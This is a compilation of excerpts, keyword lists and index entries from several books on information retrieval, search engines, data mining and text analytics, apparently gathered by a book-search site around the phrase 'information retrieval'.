information retrieval



Understanding search engines: mathematical modeling and text retrieval by Michael W. Berry, Murray Browne

information retrieval, PageRank

With this in mind, USE does not provide an overview of information retrieval systems but prefers to assume the supplementary role to the abovementioned books. Many of the ideas for USE were first presented and developed as part of a Data and Information Management course at the University of Tennessee's Computer Science Department, a course which won the 1997 Undergraduate Computational Engineering and Science Award sponsored by the United States Department of Energy and the Krell Institute.

Further Reading

but it does address the subject of IR (indexing, queries, and index construction), albeit from a unique compression perspective. One of the first books that covers various information retrieval topics was actually a collection of survey papers edited by William B. Frakes and Ricardo Baeza-Yates. Their 1992 book [30], Information Retrieval: Data Structures & Algorithms, contains several seminal works in this area, including the use of signature-based text retrieval methods by Christos Faloutsos and the development of ranking algorithms by Donna Harman. Ricardo Baeza-Yates and Berthier Ribeiro-Neto's [2] Modern Information Retrieval is another collection of well-integrated research articles from various authors with a computer-science perspective of information retrieval.

9.2 Computational Methods and Software

Two SIAM Review articles (Berry, Dumais, and O'Brien in 1995 [8] and Berry, Drmac, and Jessup in 1999 [7]) demonstrate the use of linear algebra for vector space IR models such as LSI.

One of the main objectives of this book is to identify to the novice search engine builder, such as the senior-level computer science or applied mathematics student or the information sciences graduate student specializing in retrieval systems, the impact of certain decisions that are made at various junctures of this development. One of the major decisions in developing information retrieval systems is selecting and implementing the computational approaches within an integrated software environment. Applied mathematics plays a major role in search engine performance, and Understanding Search Engines (or USE) focuses on this area, bridging the gap between the fields of applied mathematics and information management, disciplines which previously have operated largely in independent domains. But USE does not only fill the gap between applied mathematics and information management, it also fills a niche in the information retrieval literature. The work of William Frakes and Ricardo Baeza-Yates (eds.), Information Retrieval: Data Structures & Algorithms, a 1992 collection of journal articles on various related topics, Gerald Kowalski's (1997) Information Retrieval Systems: Theory and Implementation, a broad overview of information retrieval systems, and Ricardo Baeza-Yates and Berthier Ribeiro-Neto's (1999) Modern Information Retrieval, a computer-science perspective of information retrieval, are all fine textbooks on the topic, but understandably they lack the gritty details of the mathematical computations needed to build more successful search engines.


pages: 298 words: 43,745

Understanding Sponsored Search: Core Elements of Keyword Advertising by Jim Jansen

AltaVista, barriers to entry, Black Swan, bounce rate, business intelligence, butterfly effect, call centre, Claude Shannon: information theory, complexity theory, correlation does not imply causation, en.wikipedia.org, first-price auction, information asymmetry, information retrieval, intangible asset, inventory management, life extension, linear programming, longitudinal study, megacity, Nash equilibrium, Network effects, PageRank, place-making, price mechanism, psychological pricing, random walk, Schrödinger's Cat, sealed-bid auction, search engine result page, second-price auction, second-price sealed-bid, sentiment analysis, social web, software as a service, stochastic process, telemarketer, the market place, The Present Situation in Quantum Mechanics, the scientific method, The Wisdom of Crowds, Vickrey auction, Vilfredo Pareto, yield management

Journal of the American Society for Information Science and Technology, vol. 56(6), pp. 559–570. [46] Belkin, N. J. 1993. “Interaction with Texts: Information Retrieval as Information-Seeking Behavior.” In Information retrieval ’93. Von der Modellierung zur Anwendung. Konstanz, Germany: Universitaetsverlag Konstanz, pp. 55–66. [47] Saracevic, T. 1997. “Extension and Application of the Stratified Model of Information Retrieval Interaction.” In the Annual Meeting of the American Society for Information Science, Washington, DC, pp. 313–327. [48] Saracevic, T. 1996. “Modeling Interaction in Information Retrieval (IR): A Review and Proposal.” In the 59th American Society for Information Science Annual Meeting, Baltimore, MD, pp. 3–9. [49] Belkin, N., Cool, C., Croft, W. B., and Callan, J. 1993. “The Effect of Multiple Query Representations on Information Retrieval Systems.” In 16th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, pp. 339–346. [50] Belkin, N., Cool, C., Kelly, D., Lee, H.

In 16th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, pp. 339–346. [50] Belkin, N., Cool, C., Kelly, D., Lee, H.-J., Muresan, G., Tang, M.-C., and Yuan, X.-J. 2003. “Query Length in Interactive Information Retrieval.” In 26th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, Toronto, Canada, pp. 205–212. [51] Cronen-Townsend, S., Zhou, Y., and Croft, W. B. 2002. “Predicting Query Performance.” In 25th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, Tampere, Finland, pp. 299–306. [52] Efthimiadis, E. N. 2000. “Interactive Query Expansion: A User-Based Evaluation in a Relevance Feedback Environment.”

Information overload: refers to the difficulty a person can have understanding an issue and making decisions that can be caused by the presence of too much information (see Chapter 5 customers). Information retrieval: a field of study related to information extraction. Information retrieval is about developing systems to effectively index and search vast amounts of data (Source: SearchEngineDictionary.com) (see Chapter 3 keywords). Information scent: cues related to the desired outcome (see Chapter 3 keywords). Information searching: refers to people’s interaction with information-retrieval systems, ranging from adopting search strategy to judging the relevance of information retrieved (see Chapter 3 keywords). Insertion: actual placement of an ad in a document, as recorded by the ad server (Source: IAB) (see Chapter 2 model). Insertion order: purchase order between a seller of interactive advertising and a buyer (usually an advertiser or its agency) regarding the insertion date(s), number of insertions in a stated period, ad size (or commercial length), and ad placement (or time slot).


Data Mining the Web: Uncovering Patterns in Web Content, Structure, and Usage by Zdravko Markov, Daniel T. Larose

Firefox, information retrieval, Internet Archive, iterative process, natural language processing, pattern recognition, random walk, recommendation engine, semantic web, speech recognition, statistical model, William of Occam

Then we describe briefly the basics of the Web and explore the approaches taken by web search engines to retrieve web pages by keyword search. To do this we look into the technology for text analysis and search developed earlier in the area of information retrieval and extended recently with ranking methods based on web hyperlink structure. All that may be seen as a preprocessing step in the overall process of data mining the web content, which provides the input to machine learning methods for extracting knowledge from hypertext data, discussed in the second part of the book.

CHAPTER 1: INFORMATION RETRIEVAL AND WEB SEARCH

WEB CHALLENGES

As originally proposed by Tim Berners-Lee [1], the Web was intended to improve the management of general information about accelerators and experiments at CERN.

For example, the web page with the phone numbers mentioned above can be indexed by all the terms that occur in the anchor text pointing to it: department, chairs, locations, phone, and numbers. More terms may be collected from other pages pointing to it. This idea was implemented in one of the first search engines, the World Wide Web Worm system [4], and later used by Lycos and Google. This allows search engines to increase their indices with pages that have never been crawled, are unavailable, or include nontextual content that cannot be indexed, such as images and programs. As reported by Brin and Page [5] in 1998, Google indexed 24 million pages and over 259 million anchors.

EVALUATING SEARCH QUALITY

Information retrieval systems do not have formal semantics (such as that of databases), and consequently, the query and the set of documents retrieved (the response of the IR system) cannot be mapped one to one.
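The anchor-text trick described in this excerpt can be sketched in a few lines. This is a toy illustration, not the World Wide Web Worm or Google implementation; the data structures, URLs, and sample text are invented for the example:

```python
from collections import defaultdict

def build_anchor_index(pages, links):
    """Index pages by their own terms plus the anchor text of inbound links.

    pages: {url: body text} for crawled pages.
    links: (source_url, target_url, anchor_text) tuples.
    """
    index = defaultdict(set)  # term -> set of URLs
    for url, text in pages.items():
        for term in text.lower().split():
            index[term].add(url)
    # Anchor text lets us index target pages we never crawled.
    for _, target, anchor in links:
        for term in anchor.lower().split():
            index[term].add(target)
    return index

pages = {"a.edu/staff": "faculty directory"}
links = [("a.edu/home", "a.edu/phones", "department phone numbers")]
idx = build_anchor_index(pages, links)
# "a.edu/phones" is now findable via "phone", even though its content
# was never fetched -- exactly the effect the excerpt describes.
```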

Includes index. 978-0-471-66655-4 (cloth) 1. Data mining. 2. Web databases. I. Larose, Daniel T. II. Title. QA76.9.D343M38 2007 005.74 – dc22 2006025099. For my children Teodora, Kalin, and Svetoslav – Z.M. For my children Chantal, Ellyriane, Tristan, and Ravel – D.T.L.

CONTENTS

PREFACE

PART I: WEB STRUCTURE MINING
1. Information Retrieval and Web Search: Web Challenges; Web Search Engines; Topic Directories; Semantic Web; Crawling the Web; Web Basics; Web Crawlers; Indexing and Keyword Search; Document Representation; Implementation Considerations; Relevance Ranking; Advanced Text Search; Using the HTML Structure in Keyword Search; Evaluating Search Quality; Similarity Search; Cosine Similarity; Jaccard Similarity; Document Resemblance; References; Exercises
2. Hyperlink-Based Ranking: Introduction; Social Networks Analysis; PageRank; Authorities and Hubs; Link-Based Similarity Search; Enhanced Techniques for Page Ranking; References; Exercises

PART II: WEB CONTENT MINING
3. Clustering: Introduction; Hierarchical Agglomerative Clustering; k-Means Clustering; Probability-Based Clustering; Finite Mixture Problem; Classification Problem; Clustering Problem; Collaborative Filtering (Recommender Systems); References; Exercises
4. Evaluating Clustering: Approaches to Evaluating Clustering; Similarity-Based Criterion Functions; Probabilistic Criterion Functions; MDL-Based Model and Feature Evaluation; Minimum Description Length Principle; MDL-Based Model Evaluation; Feature Selection; Classes-to-Clusters Evaluation; Precision, Recall, and F-Measure; Entropy; References; Exercises
5. Classification: General Setting and Evaluation Techniques; Nearest-Neighbor Algorithm; Feature Selection; Naive Bayes Algorithm; Numerical Approaches; Relational Learning; References; Exercises

PART III: WEB USAGE MINING
6. Introduction to Web Usage Mining: Definition of Web Usage Mining; Cross-Industry Standard Process for Data Mining; Clickstream Analysis; Web Server Log Files; Remote Host Field; Date/Time Field; HTTP Request Field; Status Code Field; Transfer Volume (Bytes) Field; Common Log Format; Identification Field; Authuser Field; Extended Common Log Format; Referrer Field; User Agent Field; Example of a Web Log Record; Microsoft IIS Log Format; Auxiliary Information; References; Exercises
7. Preprocessing for Web Usage Mining: Need for Preprocessing the Data; Data Cleaning and Filtering; Page Extension Exploration and Filtering; De-Spidering the Web Log File; User Identification; Session Identification; Path Completion; Directories and the Basket Transformation; Further Data Preprocessing Steps; References; Exercises
8. Exploratory Data Analysis for Web Usage Mining: Introduction; Number of Visit Actions; Session Duration; Relationship between Visit Actions and Session Duration; Average Time per Page; Duration for Individual Pages; References; Exercises
9. Modeling for Web Usage Mining: Clustering, Association, and Classification: Introduction; Modeling Methodology; Definition of Clustering; The BIRCH Clustering Algorithm; Affinity Analysis and the A Priori Algorithm; Discretizing the Numerical Variables: Binning; Applying the A Priori Algorithm to the CCSU Web Log Data; Classification and Regression Trees; The C4.5 Algorithm; References; Exercises

INDEX

PREFACE

DEFINING DATA MINING THE WEB

By data mining the Web, we refer to the application of data mining methodologies, techniques, and models to the variety of data forms, structures, and usage patterns that comprise the World Wide Web.


pages: 593 words: 118,995

Relevant Search: With Examples Using Elasticsearch and Solr by Doug Turnbull, John Berryman

commoditize, crowdsourcing, domain-specific language, finite state, fudge factor, full text search, information retrieval, natural language processing, premature optimization, recommendation engine, sentiment analysis

In reality, there is a discipline behind relevance: the academic field of information retrieval. It has generally accepted practices to improve relevance broadly across many domains. But you’ve seen that what’s relevant depends a great deal on your application. Given that, as we introduce information retrieval, think about how its general findings can be used to solve your narrower relevance problem.[2]

[2] For an introduction to the field of information retrieval, we highly recommend the classic text Introduction to Information Retrieval by Christopher D. Manning et al. (Cambridge University Press, 2008); see http://nlp.stanford.edu/IR-book/.

1.3.1. Information retrieval

Luckily, experts have been studying search for decades. The academic field of information retrieval focuses on the precise recall of information to satisfy a user’s information need.

Example of making a relevance judgment for the query “Rambo” in Quepid, a judgment list management application

Using judgment lists, researchers aim to measure whether changes to text relevance calculations improve the overall relevance of the results across every test collection. To classic information retrieval, a solution that improves a dozen text-heavy test collections 1% overall is a success. Rather than focusing on one particular problem in depth, information retrieval focuses on solving search for a broad set of problems.

1.3.2. Can we use information retrieval to solve relevance?

You’ve already seen there’s no silver bullet. But information retrieval does seem to systematically create relevance solutions. So ask yourself: Do these insights apply to your application? Does your application care about solutions that offer incremental, general improvements to searching article-length text? Would it be better to solve the specific problems faced by your application, here and now? To be more precise, classic information retrieval begs several questions when brought to bear on applied relevance problems.
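The judgment-list measurement described above can be made concrete with a simple metric such as precision-at-k. This is a minimal sketch: the document IDs and the judgment schema are invented for illustration and are not Quepid's actual export format:

```python
def precision_at_k(results, judgments, k=5):
    """Fraction of the top-k results that humans judged relevant.

    results: ranked list of document IDs returned by the engine.
    judgments: {doc_id: True/False} from a human-rated judgment list.
    """
    top = results[:k]
    relevant = sum(1 for doc in top if judgments.get(doc, False))
    return relevant / len(top)

judgments = {"rambo-1982": True, "rambo-3": True, "rainbow-tutorial": False}
before = ["rainbow-tutorial", "rambo-1982", "rambo-3"]  # ranking pre-tuning
after = ["rambo-1982", "rambo-3", "rainbow-tutorial"]   # ranking post-tuning
print(precision_at_k(before, judgments, k=2))  # 0.5
print(precision_at_k(after, judgments, k=2))   # 1.0
```

Comparing the metric before and after a relevance change, across every test collection, is exactly the improvement loop the excerpt describes.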

If you’re fortunate, you’ll find a result addressing a problem similar to your own. That information will solve your problem, and you’ll move on. In information retrieval, relevance is defined as the practice of returning search results that most satisfy the user’s information needs. Further, classic information retrieval focuses on text ranking. Many findings in information retrieval try to measure how likely a given article is going to be relevant to a user’s text search. You’ll learn about several of these invaluable methods throughout this book—as many of these findings are implemented in open source search engines. To discover better text-searching methods, information retrieval researchers benchmark different strategies by using test collections of articles. These test collections include Amazon reviews, Reuters news articles, Usenet posts, and other similar, article-length data sets.


Data Mining: Concepts and Techniques: Concepts and Techniques by Jiawei Han, Micheline Kamber, Jian Pei

bioinformatics, business intelligence, business process, Claude Shannon: information theory, cloud computing, computer vision, correlation coefficient, cyber-physical system, database schema, discrete time, distributed generation, finite state, information retrieval, iterative process, knowledge worker, linked data, natural language processing, Netflix Prize, Occam's razor, pattern recognition, performance metric, phenotype, random walk, recommendation engine, RFID, semantic web, sentiment analysis, speech recognition, statistical model, stochastic process, supply-chain management, text mining, thinkpad, Thomas Bayes, web application

Textbooks and reference books on information retrieval include Introduction to Information Retrieval by Manning, Raghavan, and Schütze [MRS08]; Information Retrieval: Implementing and Evaluating Search Engines by Büttcher, Clarke, and Cormack [BCC10]; Search Engines: Information Retrieval in Practice by Croft, Metzler, and Strohman [CMS09]; Modern Information Retrieval: The Concepts and Technology Behind Search by Baeza-Yates and Ribeiro-Neto [BYRN11]; and Information Retrieval: Algorithms and Heuristics by Grossman and Frieder [GR04]. Information retrieval research is published in the proceedings of several information retrieval and Web search and mining conferences, including the International ACM SIGIR Conference on Research and Development in Information Retrieval (SIGIR), the International World Wide Web Conference (WWW), the ACM International Conference on Web Search and Data Mining (WSDM), the ACM Conference on Information and Knowledge Management (CIKM), the European Conference on Information Retrieval (ECIR), the Text Retrieval Conference (TREC), and the ACM/IEEE Joint Conference on Digital Libraries (JCDL).

The data cube model not only facilitates OLAP in multidimensional databases but also promotes multidimensional data mining (see Section 1.3.2). 1.5.4. Information Retrieval Information retrieval (IR) is the science of searching for documents or information in documents. Documents can be text or multimedia, and may reside on the Web. The differences between traditional information retrieval and database systems are twofold: Information retrieval assumes that (1) the data under search are unstructured; and (2) the queries are formed mainly by keywords, which do not have complex structures (unlike SQL queries in database systems). The typical approaches in information retrieval adopt probabilistic models. For example, a text document can be regarded as a bag of words, that is, a multiset of words appearing in the document.
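The bag-of-words representation described above can be sketched in a few lines (a minimal illustration, not code from the book):

```python
from collections import Counter

def bag_of_words(text):
    """Represent a document as a multiset (bag) of its words."""
    return Counter(text.lower().split())

doc = "the cat sat on the mat"
bag = bag_of_words(doc)
print(bag["the"])  # 2 -- word order is discarded; only counts remain
```

A keyword query can then be matched against documents by checking which bags contain the query terms, with no SQL-style structure required.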

Other sources of publication include major information retrieval, information systems, and Web journals, such as Journal of Information Retrieval, ACM Transactions on Information Systems (TOIS), Information Processing and Management, Knowledge and Information Systems (KAIS), and IEEE Transactions on Knowledge and Data Engineering (TKDE).

2. Getting to Know Your Data

It's tempting to jump straight into mining, but first, we need to get the data ready. This involves having a closer look at attributes and data values.


Text Analytics With Python: A Practical Real-World Approach to Gaining Actionable Insights From Your Data by Dipanjan Sarkar

bioinformatics, business intelligence, computer vision, continuous integration, en.wikipedia.org, general-purpose programming language, Guido van Rossum, information retrieval, Internet of things, invention of the printing press, iterative process, natural language processing, out of africa, performance metric, premature optimization, recommendation engine, self-driving car, semantic web, sentiment analysis, speech recognition, statistical model, text mining, Turing test, web application

Once the basics are covered, our objective will be to understand and analyze term similarity, document similarity, and finally document clustering. Important Concepts Our main objectives in this chapter are to understand text similarity and clustering. Before moving on to the actual techniques and algorithms, this section will discuss some important concepts related to information retrieval, document similarity measures, and machine learning. Even though some of these concepts might be familiar to you from the previous chapters, all of them will be useful to us as we gradually journey through this chapter. Without further ado, let’s get started. Information Retrieval (IR) Information retrieval (IR) is the process of retrieving or fetching relevant sources of information from a corpus or set of entities that hold information based on some demand. For example, it could be a query or search that users enter in a search engine and then get relevant search items pertaining to their query.
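As a minimal illustration of the document-similarity measures this chapter covers, cosine similarity over raw term-frequency vectors can be sketched as follows (the corpus and names are invented for the example; this is not the book's own code):

```python
import math
from collections import Counter

def cosine_similarity(doc1, doc2):
    """Cosine of the angle between two documents' term-frequency vectors."""
    v1, v2 = Counter(doc1.lower().split()), Counter(doc2.lower().split())
    dot = sum(v1[t] * v2[t] for t in v1)
    norm1 = math.sqrt(sum(c * c for c in v1.values()))
    norm2 = math.sqrt(sum(c * c for c in v2.values()))
    return dot / (norm1 * norm2)

print(round(cosine_similarity("blue sky", "blue ocean"), 6))  # 0.5
print(round(cosine_similarity("blue sky", "blue sky"), 6))    # 1.0
```

Scores range from 0 (no shared terms) to 1 (identical term distributions), which makes the measure convenient for both retrieval ranking and clustering.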

I recommend using gensim’s hellinger() function, available in the gensim.matutils module (which uses the same logic as our preceding function), when building large-scale systems for analyzing similarity.

Okapi BM25 Ranking

Several techniques are quite popular in information retrieval and search engines, including PageRank and Okapi BM25. The acronym BM stands for best matching. The technique is also known simply as BM25, but for the sake of completeness I refer to it as Okapi BM25: although the concepts behind the BM25 function were originally theoretical, City University in London built the Okapi Information Retrieval system in the 1980s–90s, which implemented this technique to retrieve documents on actual real-world data. This technique can also be called a framework or model based on probabilistic relevancy and was developed by several people in the 1970s–80s, including computer scientists S.
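The standard Okapi BM25 scoring formula can be sketched directly (a minimal illustration with an invented corpus; for real systems, prefer a tested library or search-engine implementation over hand-rolled code like this):

```python
import math
from collections import Counter

def bm25_score(query, doc, corpus, k1=1.2, b=0.75):
    """Okapi BM25 score of `doc` for `query` against a small corpus.

    k1 tunes term-frequency saturation; b tunes document-length
    normalization. These defaults are the commonly used values.
    """
    docs = [d.lower().split() for d in corpus]
    avgdl = sum(len(d) for d in docs) / len(docs)  # average doc length
    words = doc.lower().split()
    tf = Counter(words)
    score = 0.0
    for term in query.lower().split():
        n = sum(1 for d in docs if term in d)  # docs containing the term
        idf = math.log((len(docs) - n + 0.5) / (n + 0.5) + 1)
        f = tf[term]
        score += idf * f * (k1 + 1) / (f + k1 * (1 - b + b * len(words) / avgdl))
    return score

corpus = ["okapi bm25 ranking", "pagerank link analysis",
          "probabilistic retrieval model"]
# The document that actually contains the query term scores higher.
print(bm25_score("bm25", corpus[0], corpus) > bm25_score("bm25", corpus[1], corpus))  # True
```

Unlike plain TF-IDF, the k1 term caps how much repeated occurrences of a word can boost a document, which reflects the probabilistic-relevance reasoning the excerpt attributes to the model.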

Automated Text Classification Text Classification Blueprint Text Normalization Feature Extraction Bag of Words Model TF-IDF Model Advanced Word Vectorization Models Classification Algorithms Multinomial Naïve Bayes Support Vector Machines Evaluating Classification Models Building a Multi-Class Classification System Applications and Uses Summary Chapter 5:​ Text Summarization Text Summarization and Information Extraction Important Concepts Documents Text Normalization Feature Extraction Feature Matrix Singular Value Decomposition Text Normalization Feature Extraction Keyphrase Extraction Collocations Weighted Tag–Based Phrase Extraction Topic Modeling Latent Semantic Indexing Latent Dirichlet Allocation Non-negative Matrix Factorization Extracting Topics from Product Reviews Automated Document Summarization Latent Semantic Analysis TextRank Summarizing a Product Description Summary Chapter 6:​ Text Similarity and Clustering Important Concepts Information Retrieval (IR) Feature Engineering Similarity Measures Unsupervised Machine Learning Algorithms Text Normalization Feature Extraction Text Similarity Analyzing Term Similarity Hamming Distance Manhattan Distance Euclidean Distance Levenshtein Edit Distance Cosine Distance and Similarity Analyzing Document Similarity Cosine Similarity Hellinger-Bhattacharya Distance Okapi BM25 Ranking Document Clustering Clustering Greatest Movies of All Time K-means Clustering Affinity Propagation Ward’s Agglomerative Hierarchical Clustering Summary Chapter 7:​ Semantic and Sentiment Analysis Semantic Analysis Exploring WordNet Understanding Synsets Analyzing Lexical Semantic Relations Word Sense Disambiguation Named Entity Recognition Analyzing Semantic Representations Propositional Logic First Order Logic Sentiment Analysis Sentiment Analysis of IMDb Movie Reviews Setting Up Dependencies Preparing Datasets Supervised Machine Learning Technique Unsupervised Lexicon-based Techniques Comparing Model Performances Summary Index 
Contents at a Glance About the Author About the Technical Reviewer Acknowledgments Introduction Chapter 1:​ Natural Language Basics Chapter 2:​ Python Refresher Chapter 3:​ Processing and Understanding Text Chapter 4:​ Text Classification Chapter 5:​ Text Summarization Chapter 6:​ Text Similarity and Clustering Chapter 7:​ Semantic and Sentiment Analysis Index About the Author and About the Technical Reviewer About the Author Dipanjan Sarkar is a data scientist at Intel, the world’s largest silicon company, which is on a mission to make the world more connected and productive.


pages: 263 words: 75,610

Delete: The Virtue of Forgetting in the Digital Age by Viktor Mayer-Schönberger

en.wikipedia.org, Erik Brynjolfsson, Firefox, full text search, George Akerlof, information asymmetry, information retrieval, information trail, Internet Archive, invention of movable type, invention of the printing press, John Markoff, Joi Ito, lifelogging, moveable type in China, Network effects, packet switching, Panopticon Jeremy Bentham, pattern recognition, RFID, slashdot, Steve Jobs, Steven Levy, The Market for Lemons, The Structural Transformation of the Public Sphere, Vannevar Bush

See information dossiers Dutch citizen registry, 141, 157–58 DVD, 64–65, 145 eBay, 93, 95 Ecommerce, 131 Egypt, 32 Eisenstein, Elizabeth, 37, 38 e-mails: preservation of, 69 entropy, 22 epics, 25, 26, 27 European Human Rights Convention, 110 European Union Privacy Directive, 158–59, 160 exit, 99 Expedia.com, 8 expiration dates for information, 171–95, 198–99 binary nature of, 192–93 imperfection of, 194–95 negotiating, 185–89, 187 persistence of, 183–85 societal preferences for, 182–83 external memory, limitations of, 34 Facebook, 2, 3, 84, 86, 197 Feldmar, Andrew, 3–4, 5, 104–5, 109, 111, 197 Felten, Edward, 151–52, 188 fiber-optic cables, 80–81 fidelity, 60 filing systems, 74 film, 47 fingerprints, 78 First Amendment, 110 Flash memory, 63 Flickr, 84, 102, 124 flight reservation, 8 Foer, Joshua, 21 forgetting: cost of, 68, 91, 92 human, 19–20, 114–17 central importance of, 13, 21 societal, 13 forgiving, 197 Foucault, Michel, 11, 112 free-riding, 133 Friedman, Lawrence, 106 Gandy, Oscar, 11, 165 Gasser, Urs, 3, 130 “Goblin edits,” 62 Google, 2, 6–8, 70–71, 84, 103, 104, 109, 130–31, 175–78, 179, 186, 197 governmental decision-making, 94 GPS, 9 Graham, Mary, 94 Gutenberg, 37–38 hard disks, 62–63 hieroglyphs, 32 Hilton, Paris, 86 history: omnipresence of, 125 Hotmail, 69 human cognition, 154–57 “Imagined Communities,” 43 index, 73–74, 90 full-text, 76–77 information: abstract, 17 biometric, 9 bundling of, 82–83 control over, 85–87, 91, 97–112, 135–36, 140, 167–68, 181–82 deniability of, 87 decontextualization of, 78, 89–90, 142 economics of, 82–83 incompleteness of, 156 interpretation of, 96 leakages of, 105, 133–34 legally mandated retention of, 160–61 lifespan of, 172 markets for, 145–46 misuse of, 140 peer-to-peer sharing of, 84, 86 processors of, 175–78 production cost of, 82–83 property of, 143 quality of, 96–97 recall of, 18–19 recombining of, 61–62, 85, 88–90 recontextualization of, 89–90 retrieval of, 72–79 risk of collecting, 158 role of, 85 self-disclosure 
of, 4 sharing of, 3, 84–85 total amount of, 52 information control: relational concepts of, 153 information dossiers, 104 digital, 123–25 information ecology, 157–63 information power, 112 differences in, 107, 133, 187, 191, 192 information privacy, 100, 108, 135, 174, 181–82 effectiveness of rights to, 135–36, 139–40, 143–44 enforcement of right to, 139–40 purpose limitation principle in, 136, 138, 159 rights to, 134–44 information retrieval. See information: retrieval of information sharing: default of, 88 information storage: capacity, 66 cheap, 62–72 corporate, 68–69 density of, 71 economics of, 68 increase in, 71–72 magnetic, 62–64 optical, 64–65 relative cost of, 65–66 sequential nature of analog, 75 informational self-determination, 137 relational dimension of, 170 intellectual property (IP), 144, 146, 150, 174 Internet, 79 “future proof,” 59–60 peer-production and, 131–32 Internet archives, 4 Islam: printing in, 40 Ito, Joi, 126 Johnson, Deborah, 14 Keohane, Robert, 98 Kodak, Eastman, 45–46 Korea: printing in, 40 language, 23–28 Lasica, J.

The likely medium-term outcome is that storage capacity will continue to double and storage costs to halve about every eighteen to twenty-four months, leaving us with an abundance of cheap digital storage. Easy Retrieval Remembering is more than committing information to memory. It includes the ability to retrieve that information later easily and at will. As humans, we are all too familiar with the challenges of information retrieval from our brain’s long-term memory. External analog memory, like books, holds huge amounts of information, but finding a particular piece of information in it is difficult and time-consuming. Much of the latent value of stored information remains trapped, unlikely to be utilized. Even though we may have stored it, analog information that cannot be retrieved easily in practical terms is no different from having been forgotten.

Even though we may have stored it, analog information that cannot be retrieved easily in practical terms is no different from having been forgotten. In contrast, retrieval from digital memory is vastly easier, cheaper, and swifter: a few words in the search box, a click, and within a few seconds a list of matching information is retrieved and presented in neatly formatted lists. Such trouble-free retrieval greatly enhances the value of information. To be sure, humans have always tried to make information retrieval easier and less cumbersome, but they faced significant hurdles. Take written information. The switch from tablets and scrolls to bound books helped in keeping information together, and certainly improved accessibility, but it did not revolutionize retrieval. Similarly, libraries helped amass information, but didn’t do as much in tracking it down. Only well into the second millennium, when workable indices of book collections (initially perhaps developed out of the extensive organization into subdivisions, later chapters and verses of Hebrew and Christian scriptures) became common, were librarians able to locate a book based on title and author.30 It took centuries of refinement to develop standardized book cataloguing and shelving techniques, as part of the rise of the modern library.


pages: 290 words: 73,000

Algorithms of Oppression: How Search Engines Reinforce Racism by Safiya Umoja Noble

A Declaration of the Independence of Cyberspace, affirmative action, Airbnb, borderless world, cloud computing, conceptual framework, crowdsourcing, desegregation, Donald Trump, Edward Snowden, Filter Bubble, Firefox, Google Earth, Google Glasses, housing crisis, illegal immigration, immigration reform, information retrieval, Internet Archive, Jaron Lanier, Mitch Kapor, Naomi Klein, new economy, PageRank, performance metric, phenotype, profit motive, Silicon Valley, Silicon Valley ideology, Snapchat, Tim Cook: Apple, union organizing, women in the workforce, yellow journalism

In a broader sense, however, Tefko Saracevic, a professor emeritus of information science at Rutgers, suggests that information is constituted through “cognitive processing and understanding.”41 There is a pivotal relationship between information and users that is dependent on human understanding. It is this point that I want to emphasize in the context of information retrieval: information provided to a user is deeply contextualized and stands within a frame of reference. For this reason, it is important to study the social context of those who are organizing information and the potential impacts of the judgments inherent in informational organization processes. Information must be treated in a context; “it involves motivation or intentionality, and therefore it is connected to the expansive social context or horizon, such as culture, work, or problem-at-hand,” and this is fundamental to the origins of information science and to information retrieval.42 Information retrieval as a practice has become a highly commercialized industry, predicated on federally funded experiments and research initiatives, leading to the formation of profitable ventures such as Yahoo!

Saracevic notes that “the domain of information science is the transmission of the universe of human knowledge in recorded form, centering on manipulation (representation, organization, and retrieval) of information, rather than knowing information.”43 This foregrounds the ways that representations in search engines are decontextualized in one specific type of information-retrieval process, particularly for groups whose images, identities, and social histories are framed through forms of systemic domination. Although there is a long, broad, and historical context for addressing categorizations, the impact of learning from these traditions has not yet been fully realized.44 Attention to “the universe of human knowledge” is suggestive for contextualizing information-retrieval practices this way, leading to inquiries into the ways current information-retrieval practices on the web, via commercial search engines, make some types of information available and suppress others. The present focus on the types of information presented in identity-based searches shows that they are removed from the social context of the historical representations and struggles over disempowering forms of representation.

., not working at the level of code) to engage in sharing links to and from websites.31 Research shows that users typically use very few search terms when seeking information in a search engine and rarely use advanced search queries, as most queries are different from traditional offline information-seeking behavior.32 This front-end behavior of users appears to be simplistic; however, the information retrieval systems are complex, and the formulation of users’ queries involves cognitive and emotional processes that are not necessarily reflected in the system design.33 In essence, while users use the simplest queries they can in a search box because of the way interfaces are designed, this does not always reflect how search terms are mapped against more complex thought patterns and concepts that users have about a topic. This disjunction between, on the one hand, users’ queries and their real questions and, on the other, information retrieval systems makes understanding the complex linkages between the content of the results that appear in a search and their import as expressions of power and social relations of critical importance.


pages: 291 words: 77,596

Total Recall: How the E-Memory Revolution Will Change Everything by Gordon Bell, Jim Gemmell

airport security, Albert Einstein, book scanning, cloud computing, conceptual framework, Douglas Engelbart, full text search, information retrieval, invention of writing, inventory management, Isaac Newton, John Markoff, lifelogging, Menlo Park, optical character recognition, pattern recognition, performance metric, RAND corporation, RFID, semantic web, Silicon Valley, Skype, social web, statistical model, Stephen Hawking, Steve Ballmer, Ted Nelson, telepresence, Turing test, Vannevar Bush, web application

Cathal Gurrin’s Web page is http://www.computing.dcu.ie/~cgurrinand here are some of his papers about e-memories. Doherty, A., C. Gurrin, G. Jones, and A. F. Smeaton. “Retrieval of Similar Travel Routes Using GPS Tracklog Place Names.” SIGIR 2006—Conference on Research and Development on Information Retrieval, Workshop on Geographic Information Retrieval, Seattle, Washington, August 6-11, 2006. Gurrin, C., A. F. Smeaton, D. Byrne, N. O’Hare, G. Jones, and N. O’Connor. “An Examination of a Large Visual Lifelog.” AIRS 2008—Asia Information Retrieval Symposium, Harbin, China, January 16-18, 2008. Lavelle, B., D. Byrne, C. Gurrin, A. F. Smeaton, and G. Jones. “Bluetooth Familiarity: Methods of Calculation, Applications and Limitations.” MIRW 2007—Mobile Interaction with the Real World, Workshop at the MobileHCI07: 9th International Conference on Human Computer Interaction with Mobile Devices and Services, Singapore, September 9, 2007.

